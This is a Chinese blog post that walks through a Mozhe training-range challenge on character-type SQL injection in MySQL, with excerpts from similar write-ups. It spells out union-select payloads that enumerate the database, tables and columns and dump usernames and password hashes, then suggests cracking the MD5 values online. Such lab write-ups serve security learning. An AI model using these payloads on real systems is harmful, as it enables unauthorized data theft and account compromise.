墨者 - SQL手工注入漏洞测试(MySQL数据库-字符型)

最新推荐文章于 2025-08-02 16:58:52 发布
原创 最新推荐文章于 2025-08-02 16:58:52 发布 · 691 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了一种字符型SQL注入的实战方法,通过构造特定的SQL语句,进行数据库信息的探测,包括数据库名、表名、字段名及字段值的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

字符型,其实与数字型得注入思路没什么区别,只不过需要注意构造单引号和后面加注释就行了

id=tingjigonggao' order by 1 -- 测试 字段个数,发现有4个

 试过盲猜表,admin,manger,失败

 老老实实暴库,先测回显位置  id=tingjigongga' union select '1','2','3','4' -- 

 

 

/new_list.php?id=tingjigongga' union select '1',database(),'3','4' --      爆库

 id=tingjigongga' union select '1',(select group_concat(table_name) from information_schema.tables where table_schema = 'mozhe_discuz_stormgroup' limit 0,1),'3','4' --     爆表

 

id=tingjigonggao1' union select '1',(select group_concat(column_name) from information_schema.columns where table_name='stormgroup_member'),'3','4' --      爆字段

id=tingjigonggao1' union select '1',(select group_concat(name,0x7c,password,0x7e) from stormgroup_member),'3','4' --    

爆字段值

MD5在线解密即可 

墨者学院—— SQL手工注入漏洞测试(MySQL数据库-字符型)
Lollipop_zhi的博客
02-26 2389
1.启动靶场环境,老地方点击 2.看地址栏,合理怀疑是否有注入点 这里插入知识点——怎么判断有注入点? 一般方法: and 1=1 正常 and 1=2 错误 背后的原理是逻辑运算 真且真=真;真且假=假 所以只需要让它能判断出假,就可以合理怀疑存在注入点 比如:id=jhfjkashlk(瞎打的) 改成 id=jhdak 显示异常,有注入点 3.尝试简单使用order by 猜解列名数量,不成功 order by 之后我才判断了单引号闭合,也就是id=tingjigon
SQL手工注入漏洞测试(MySQL数据库-字符型)
kugaigao_的博客
12-10 473
启动靶场 点击‘关于平台停机维护的通知’ 在id后加’%23 判断是否存在注入点,加’ and 1=1%23,存在注入点。 ’ order by 5%23 ’ order by 4%23,有四个字段。 id=1’ and 1=2 union select 1,2,3,4%23 id=1’ and 1=2 union select 1,database(),version(),4%23 id=1’ ...
SQL手工注入漏洞测试(MySQL数据库-字符型
m0_67399862的博客
05-13 337
打开题目后出现改主页,点击下面的通知 看到id名为字符串,需要留意,将id名改为任意字符串报错,说明有注入点 发现直接用order by语句不能进行猜解 尝试使用单引号(‘)闭合前面的单引号,让SQL语句能执行 通过order by语句可猜解出字段数为4 使用union select进行联合查询,发现1,2,3,4没有显示 所以在id前的字符串加上负号 因为只显示出2,3,所以用想查询的信息替换数字2,3 由查询得,数据库名为mozhe_disc...
sql注入(2) 墨者学院SQL手工注入漏洞测试MySQL数据库-字符型
c10udz的博客
04-12 4805
这里我们可以看到版本是10.2.15,前面说过MySQL5.0版本以上有个自带的information_shema数据库,利用这个数据库可以查到整个数据库的结构,不然就只能盲猜了。//注释:(1)information_schema.tables表示information_schena这个数据库下的表,在MySQL中【.】代表下一级。利用'order by 任意数字 %23去判断,得到4(结尾加%23的原因:在一个语句结尾时,需要用#结尾,而#的url编码就是%23)table_schema:数据库名。
墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_46694260的博客
03-27 4112
0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入。同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清楚原理和方法的话…还是可以看的,大家多多给我点赞吧,哈哈哈哈哈,还是那句话,菜鸟一个,大佬勿喷~ 0x01 过程 首先,还是老样子,我们先看一下题目 这里通过题目我们知道,这次SQL注入字符型SQL注入 那我们就进入靶场环境 可以看到和上次一样,有一个登录系统,登录框下面有一个维护新闻轮播框 我们点进去
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型)
最新发布
2303_81096390的博客
08-02 579
进入靶场环境,点击登录框下面的那一串流动的字符进入具体的注入点页面查看url,发现有可变的参数?id=,此处为字符型注入sql注入分为字符型注入和数字型注入,两者有什么区别呢,简单来说就是字符型注入需要闭合,而数字型注入不需要闭合具体解释:为什么字符型需要闭合,数字型不需要?
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
m0_73681638的博客
06-16 421
通常 Sql 注入漏洞分为 2 种类型:数字型,字符型。数字型判断:在加载好的Url 地址中输入and 1=1,页面依旧运行正常,继续进行下一步。断网页是否存在sql注入使用单引号判断法:在参数后面加上单引号, 原因为无论字符型还是整型都会 因为单引号个数不匹配而报错。使用火狐插件—hackbar,加载出当前界面的url,使用单引号判断法,页面返回错误,存在 Sql 注 入。
墨者学院SQL手工注入漏洞测试(MySQL数据库-字符型
Fisher
12-02 799
写在前面: 最近准备从头再来过一遍sql,所以开始刷墨者学院的题目。 这是一道最简单的字符型 联合注入题目 目的:拿到用户与密码 首先寻找注入点,我们发现在维护界面存在id字段可能存在注入。 1.找闭合字符 首先尝试寻找闭合字符,当输入‘时界面加载正确 可能是’,接着测试 and 1=1 界面正确,and1=2 界面错误 没错说明确实闭合字符是单引号。 当然需要–+起到闭合后面闭合字符的作用。 接下来用order by 判断有多少列 order by 1时正确 order by 5 时错误说明共4列
SQL手工注入漏洞测试(MySQL数据库-字符型)-墨者
weoptions的博客
12-01 2425
———靶场专栏———分享我的解题过程
墨者靶场 SQL手工注入漏洞测试(MySQL数据库-字符型)
曹振国的博客
06-19 582
联合查询1.查询注入点2.查询字段数3.查询库名4.查询表名5.查询字段6.查询字段的值7.解压status=1的md5登录 1.查询注入点 ?id=tingjigonggao'and 1=1 -- qwe //正常输出 2.查询字段数 ?id=tingjigonggao'and 1=1 order by 4 -- qwe //正常 ?id=tingjigonggao'and 1=1 order by 5 -- qwe //报错 说明是4个字段 3.查询库名 ?id=tingjigonggao
墨者学院05 SQL手工注入漏洞测试(MySQL数据库-字符型)
weixin_42789937的博客
01-25 368
墨者学院05 SQL手工注入漏洞测试(MySQL数据库-字符型),看见SQL内心已经没什么波澜...
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库字符型注入
全村的希望
11-25 1379
SQL手工注入+sqlmap工具测试漏洞测试(MySQL数据库字符型注入
SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录
chick11的博客
07-16 507
一进来看到一个停机公告,点开查看 发现链接中有字符参数,怀疑存在字符型注入 输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1 ' and '1'='2 发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。 通过order by 子句判断字段数 order by 1 order by 2 order by 5 order by 4 当order by 4 时网页正常响应,by 5时
墨者学院SQL手工注入漏洞测试(MySQL数据库)
Lakers248_的博客
05-14 706
解题思路+知识点
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值